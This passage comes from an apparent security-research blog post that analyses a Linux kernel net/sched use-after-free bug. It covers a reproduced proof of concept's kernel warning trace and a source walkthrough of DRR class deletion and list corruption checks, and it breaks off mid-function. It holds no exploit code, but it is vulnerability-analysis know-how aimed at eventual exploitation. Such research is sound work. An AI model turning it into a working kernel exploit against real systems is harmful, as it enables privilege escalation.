<p>So those are the side effects the bug produces. At this point, I didn’t know a single thing about <code class="language-plaintext highlighter-rouge">/net/sched</code>, classes, qdiscs, etc, so the learning curve during this process was steep. I had never dealt with this subsystem before in my life. But after a lot of Googling and ChatGPTing, I was able to reproduce the PoC in the patch with the <code class="language-plaintext highlighter-rouge">tc</code> utility just as the patch specifies. I went through all the steps and when I got to step 14 and it was time to trigger the UAF, I got the following splat after deleting class 1:3:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   10.519000] ------------[ cut here ]------------
</span><span class="gp">[   10.521778] list_del corruption, ffff8fdd50a008d0-&gt;</span>next is NULL
<span class="go">[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
</span><span class="gp">[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #</span>1
<span class="go">[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
</span><span class="gp">[   10.600704]  &lt;TASK&gt;</span><span class="w">
</span><span class="go">[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
</span><span class="gp">[   10.699977]  &lt;/TASK&gt;</span><span class="w">
</span><span class="go">[   10.701360] ---[ end trace 8e001f66f1703586 ]---
</span></code></pre></div></div>

<p>At this point I was excited because I thought I had recreated the bug and caused a UAF and I’d soon be looking for ways to exploit the bug; however I was extremely wrong. All this splat is is a warning that there was an invalid <code class="language-plaintext highlighter-rouge">list_del</code> operation. In my development environment, this was enough to cause a kernel panic. I had KASAN enabled so if there was a UAF I would’ve seen a different splat, so now I’m very confused. On further inspection, I never even reached the step where I delete class 1:1 as in the PoC, so what is going on? Why does my PoC stop here on this <code class="language-plaintext highlighter-rouge">list_del</code> operation? Time to dig into the details.</p>

<p>First, why do even encounter a bad <code class="language-plaintext highlighter-rouge">list_del</code> operation? We still don’t know much about this bug or subsystem yet. I had basically just recreated the PoC in the patch and had done almost zero critical thinking of my own. After a lot of <code class="language-plaintext highlighter-rouge">printk</code> debugging, I finally figured out where the invalid <code class="language-plaintext highlighter-rouge">list_del</code> comes from.</p>

<h2 id="list-bug-analysis">List Bug Analysis</h2>
<p>First of all, why is <code class="language-plaintext highlighter-rouge">list_del</code> complaining? Well it turns out that a common kernel configuration is <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code>, which turns the list manipulation APIs, like <code class="language-plaintext highlighter-rouge">list_del</code> into more careful versions of themselves. <code class="language-plaintext highlighter-rouge">list_del</code>’s job is to remove a <code class="language-plaintext highlighter-rouge">list_head</code> node out of a linked list. If you can visualize a linked list in the kernel, it’s essentially a list of nodes. Each node contains a <code class="language-plaintext highlighter-rouge">prev</code> and a <code class="language-plaintext highlighter-rouge">next</code> pointer that reference the previous and the next node in the list respectively. So the debug list configuration has some sanity checks that make sure that when you go to remove a node from a list, there hasn’t been any corruption of the node itself. When we delete class 1:3, something happens during that process and we end up here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__list_del_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">__list_del_entry_valid</span><span class="p">(</span><span class="n">entry</span><span class="p">))</span>
		<span class="k">return</span><span class="p">;</span>

	<span class="n">__list_del</span><span class="p">(</span><span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">,</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Things are going awry in the <code class="language-plaintext highlighter-rouge">__list_del_entry_valid</code> check it seems:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
 * Performs list corruption checks before __list_del_entry(). Returns false if a
 * corruption is detected, true otherwise.
 *
 * With CONFIG_LIST_HARDENED only, performs minimal list integrity checking
 * inline to catch non-faulting corruptions, and only if a corruption is
 * detected calls the reporting function __list_del_entry_valid_or_report().
 */</span>
<span class="k">static</span> <span class="n">__always_inline</span> <span class="n">bool</span> <span class="nf">__list_del_entry_valid</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">bool</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">IS_ENABLED</span><span class="p">(</span><span class="n">CONFIG_DEBUG_LIST</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">prev</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">next</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

		<span class="cm">/*
		 * With the hardening version, elide checking if next and prev
		 * are NULL, LIST_POISON1 or LIST_POISON2, since the immediate
		 * dereference of them below would result in a fault.
		 */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">==</span> <span class="n">entry</span> <span class="o">&amp;&amp;</span> <span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">==</span> <span class="n">entry</span><span class="p">))</span>
			<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">ret</span> <span class="o">&amp;=</span> <span class="n">__list_del_entry_valid_or_report</span><span class="p">(</span><span class="n">entry</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Which in turn calls <code class="language-plaintext highlighter-rouge">__list_del_entry_valid_or_report</code> because we do indeed have <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code> enabled:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bool</span> <span class="nf">__list_del_entry_valid_or_report</span><span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">entry</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">prev</span><span class="p">,</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>

	<span class="n">prev</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">;</span>
	<span class="n">next</span> <span class="o">=</span> <span class="n">entry</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;next is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">entry</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;prev is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">entry</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span> <span class="o">==</span> <span class="n">LIST_POISON1</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;next is LIST_POISON1 (%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">LIST_POISON1</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span> <span class="o">==</span> <span class="n">LIST_POISON2</span><span class="p">,</span>
			<span class="s">"list_del corruption, %px-&gt;prev is LIST_POISON2 (%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">LIST_POISON2</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">!=</span> <span class="n">entry</span><span class="p">,</span>
			<span class="s">"list_del corruption. prev-&gt;next should be %px, but was %px. (prev=%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">prev</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">,</span> <span class="n">prev</span><span class="p">)</span> <span class="o">||</span>
	    <span class="n">CHECK_DATA_CORRUPTION</span><span class="p">(</span><span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">!=</span> <span class="n">entry</span><span class="p">,</span>
			<span class="s">"list_del corruption. next-&gt;prev should be %px, but was %px. (next=%px)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
			<span class="n">entry</span><span class="p">,</span> <span class="n">next</span><span class="o">-&gt;</span><span class="n">prev</span><span class="p">,</span> <span class="n">next</span><span class="p">))</span>
		<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>

	<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So what’s going on? We don’t know much about the <code class="language-plaintext highlighter-rouge">/net/sched</code> code yet, but it appears that because we have <code class="language-plaintext highlighter-rouge">CONFIG_DEBUG_LIST</code>, there is a check on the node you want to remove from the list. If you had the following linked list:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">A -&gt;</span><span class="w"> </span>B -&gt; C -&gt; D -&gt; A
</code></pre></div></div>
<p>Each node in the list would point to its neighbors, for instance, for node <code class="language-plaintext highlighter-rouge">D</code> it would have the node <code class="language-plaintext highlighter-rouge">C</code> in its <code class="language-plaintext highlighter-rouge">prev</code> field and it would have node <code class="language-plaintext highlighter-rouge">A</code> in its <code class="language-plaintext highlighter-rouge">next</code> field because the list is circular. The validity check here makes sure that if you want to delete node <code class="language-plaintext highlighter-rouge">D</code> for instance, that the node <code class="language-plaintext highlighter-rouge">C</code> says it’s next node is <code class="language-plaintext highlighter-rouge">D</code> and that node <code class="language-plaintext highlighter-rouge">A</code> says its previous node is <code class="language-plaintext highlighter-rouge">D</code>. Makes sense. But in our <code class="language-plaintext highlighter-rouge">list_del</code> <code class="language-plaintext highlighter-rouge">WARN()</code> banner we see that this function returns false because <code class="language-plaintext highlighter-rouge">list_del corruption, ffff8fdd50a008d0-&gt;next is NULL</code>. So we can’t even check the neighboring nodes for sanity because our node <code class="language-plaintext highlighter-rouge">D</code> doesn’t even have a <code class="language-plaintext highlighter-rouge">next</code> field value, it’s <code class="language-plaintext highlighter-rouge">NULL</code>.</p>

<p>Ok so we fail this <code class="language-plaintext highlighter-rouge">list_del</code> and the PoC just dies here because when we delete class 1:3 the <code class="language-plaintext highlighter-rouge">list_head</code> that we submit for deletion at some point in the <code class="language-plaintext highlighter-rouge">/net/sched</code> is either corrupted or it was never initialized. So let’s now figure out what is going on in <code class="language-plaintext highlighter-rouge">/net/sched</code> when this bug occurs to see if we can figure out what is happening.</p>

<h2 id="sched-bug-analysis">Sched Bug Analysis</h2>
<p>Taking a deeper dive into the <code class="language-plaintext highlighter-rouge">/net/sched</code> code it became clear why the node that we were deleting was in a buggy state. In the PoC we create a class 1:1 and assign it a qdisc of type <code class="language-plaintext highlighter-rouge">plug</code>. A <code class="language-plaintext highlighter-rouge">plug</code> qdisc is meant to literally stop packets from being dequeued until its given an explicit release command or deleted, it plugs up the <code class="language-plaintext highlighter-rouge">qdisc</code> with packets as they are “enqueued”. So if we send a packet to class 1:1, that packet will be enqueued in 1:1’s qdisc that is a plug type, meaning those packets will sit there until we explicitly ask for them. So at this point, it’s clear that for some reason, making sure packets are held in the plug qdisc is crucial to the PoC. But what about our buggy <code class="language-plaintext highlighter-rouge">list_head</code> node? It’s clear that after we send a packet to class 1:1 and the plug qdisc, we send a packet to 1:3. Class 1:3 is the class that we grafted the already existing pfifo qdisc onto from 3:1 when we exercised the re-parenting bug. Let’s take a look at what happens when we send a packet to a class, namely class 1:3:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">drr_enqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">to_free</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">bool</span> <span class="n">first</span><span class="p">;</span>

	<span class="n">cl</span> <span class="o">=</span> <span class="n">drr_classify</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">sch</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">err</span><span class="p">);</span>		<span class="c1">// [1]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">cl</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&amp;</span> <span class="n">__NET_XMIT_BYPASS</span><span class="p">)</span>
			<span class="n">qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="n">__qdisc_drop</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">to_free</span><span class="p">);</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">first</span> <span class="o">=</span> <span class="o">!</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="p">;</span>			<span class="c1">// [2]</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">qdisc_enqueue</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">,</span> <span class="n">to_free</span><span class="p">);</span>	<span class="c1">// [3]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span> <span class="o">!=</span> <span class="n">NET_XMIT_SUCCESS</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">net_xmit_drop_count</span><span class="p">(</span><span class="n">err</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">drops</span><span class="o">++</span><span class="p">;</span>
			<span class="n">qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="p">}</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">first</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">list_add_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>	<span class="c1">// [4]</span>
		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">sch</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">backlog</span> <span class="o">+=</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">++</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There’s a few important things going in here. I’ve not yet mentioned the <code class="language-plaintext highlighter-rouge">drr</code> aspect of this which stands for “Deficit Round Robin” which is the type of algorithm used to determine how packet delivery is scheduled in this PoC. The details of the DRR algorithm are not super important, but from what I have learned at a high level it basically keeps track of what classes are currently “active”, ie, have packets enqueued to them, and tries to deliver the packets based on “deficits” that are configurable. So this way we make sure that packets are distributed in a way that makes sense to us as an end-user trying to shape traffic or guarantee some quality of service. This function is invoked when the qdisc we set up in step 1 has been enqueued with a packet (at the interface level, we use loopback):</p>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: In this step we have a packet, and we attempt to classify the packet into one of the existing <code class="language-plaintext highlighter-rouge">drr</code> classes that belong in the root qdisc hierarchy with the <code class="language-plaintext highlighter-rouge">drr_classify</code> function</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: If we find a class that matches for the packet, ie the priority matches a class we have setup like 1:3, we check class 1:3’s qdisc and see if it has been enqueued with any packets, if it has not, the <code class="language-plaintext highlighter-rouge">first</code> flag is set to true</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: Class 1:3’s qdisc is enqueued with a packet</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[4]</code>: If this was the class’s first packet, this packet needs to be placed on the <code class="language-plaintext highlighter-rouge">drr</code> scheduler’s <code class="language-plaintext highlighter-rouge">active</code> list which contains <code class="language-plaintext highlighter-rouge">list_head</code> structs for every <code class="language-plaintext highlighter-rouge">drr</code> class that has packets enqueued so that the scheduler can apply the algorithm and make sure packets are dequeued appropriately</p>
  </li>
</ul>

<p>Everything in here makes sense and after printing out the class and qdisc pointer values and lining them up with allocations from the PoC when we set up the hierarchy, nothing seemed amiss here. Let’s look at the backtrace from when the <code class="language-plaintext highlighter-rouge">list_del</code> <code class="language-plaintext highlighter-rouge">WARN()</code> occurs to see what function that occurred in:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
</span></code></pre></div></div>

<p>So we land in <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code> from a call to <code class="language-plaintext highlighter-rouge">drr_delete_class</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">drr_delete_class</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">,</span>
			    <span class="k">struct</span> <span class="n">netlink_ext_ack</span> <span class="o">*</span><span class="n">extack</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">filter_cnt</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>

	<span class="n">sch_tree_lock</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>

	<span class="n">qdisc_purge_queue</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				<span class="c1">// [1]</span>
	<span class="n">qdisc_class_hash_remove</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">clhash</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">common</span><span class="p">);</span>	<span class="c1">// [2]</span>

	<span class="n">sch_tree_unlock</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>

	<span class="n">drr_destroy_class</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">cl</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: In this step we purge the class’s qdisc, which in our case would be our buggy qdisc that we re-parented to 1:3 from 3:1</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: Remove this class’s hash from the scheduler’s class hash table so that it cannot be looked up again</p>
  </li>
</ul>

<p>The source doesn’t quite match with the back trace, probably because of inlining, but we end up in <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code> from <code class="language-plaintext highlighter-rouge">qdisc_purge_queue</code> calling <code class="language-plaintext highlighter-rouge">qdisc_tree_reduce_backlog</code> as part of the qdisc cleaning up process. This is where our buggy state reveals itself</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">qdisc_tree_reduce_backlog</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span> <span class="kt">int</span> <span class="n">n</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">bool</span> <span class="n">qdisc_is_offloaded</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">TCQ_F_OFFLOADED</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">Qdisc_class_ops</span> <span class="o">*</span><span class="n">cops</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cl</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">parentid</span><span class="p">;</span>
	<span class="n">bool</span> <span class="n">notify</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">drops</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="n">drops</span> <span class="o">=</span> <span class="n">max_t</span><span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="n">rcu_read_lock</span><span class="p">();</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">parentid</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">parent</span><span class="p">))</span> <span class="p">{</span>				<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">parentid</span> <span class="o">==</span> <span class="n">TC_H_ROOT</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">TCQ_F_NOPARENT</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="cm">/* Notify parent qdisc only if child qdisc becomes empty.
		 *
		 * If child was empty even before update then backlog
		 * counter is screwed and we skip notification because
		 * parent class is already passive.
		 *
		 * If the original child was offloaded then it is allowed
		 * to be seem as empty, so the parent is notified anyway.
		 */</span>
		<span class="n">notify</span> <span class="o">=</span> <span class="o">!</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="o">!</span><span class="n">n</span> <span class="o">&amp;&amp;</span>
						       <span class="o">!</span><span class="n">qdisc_is_offloaded</span><span class="p">);</span>
		<span class="cm">/* TODO: perform the search on a per txq basis */</span>
		<span class="n">sch</span> <span class="o">=</span> <span class="n">qdisc_lookup</span><span class="p">(</span><span class="n">qdisc_dev</span><span class="p">(</span><span class="n">sch</span><span class="p">),</span> <span class="n">TC_H_MAJ</span><span class="p">(</span><span class="n">parentid</span><span class="p">));</span> 
		<span class="k">if</span> <span class="p">(</span><span class="n">sch</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">parentid</span> <span class="o">!=</span> <span class="n">TC_H_ROOT</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>
